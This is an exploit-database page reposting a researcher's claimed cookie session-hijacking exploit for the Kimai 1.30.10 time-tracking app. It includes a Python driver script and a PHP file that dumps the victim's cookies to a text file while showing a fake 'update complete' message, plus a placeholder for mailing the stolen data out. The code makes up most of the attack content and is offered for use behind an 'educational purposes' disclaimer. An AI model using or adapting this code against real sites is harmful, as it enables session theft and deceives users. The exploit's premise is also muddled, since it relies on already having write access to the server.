Kimai1.30.10 samesite cookievulnerability session hijacking Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-06 | Type : webapps | Platform : php
This exploit / vulnerability Kimai1.30.10 samesite cookievulnerability session hijacking is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
## Author: nu11secur1ty
## Date: 02.23.2023
## Vendor: https://www.kimai.org/
## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions

## Description:
The Kimai-1.30.10 is vulnerable to
SameSite-Cookie-Vulnerability-session-hijacking.
The attacker can trick the victim to update or upgrade the system, by
using a very malicious exploit to steal his vulnerable cookie and get
control of his session.

STATUS: HIGH Vulnerability

[+]Exploit:
## WARNING: The EXPLOIT IS FOR ADVANCED USERS!
This is only one example:
```python
#!/usr/bin/python
import os
import webbrowser
import time

webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
input("After you log in please press any key to continue...")
os.system("copy Update.php
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
time.sleep(3)
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
time.sleep(3)
os.system("copy
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt
C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
# Your mail-sending code must be here ;)
time.sleep(7)
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")

```
-----------------------------------------
```PHP
<?php
//echo '<pre>';
// print_r( $_COOKIE );
//die();

$fp = fopen('PoC.txt', 'w');
fwrite($fp, print_r($_COOKIE, TRUE));
fclose($fp);
echo "DONE: Now you are already updated! Enjoy your system Kimai
1.30.10 stable (Ayumi)";
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)

## Proof and Exploit:
[href](https://streamable.com/md9fmr)

## Time spend:
03:00:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Kimai1.30.10 samesite cookievulnerability session hijacking


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Kimai1.30.10 samesite cookievulnerability session hijacking Vulnerability / Exploit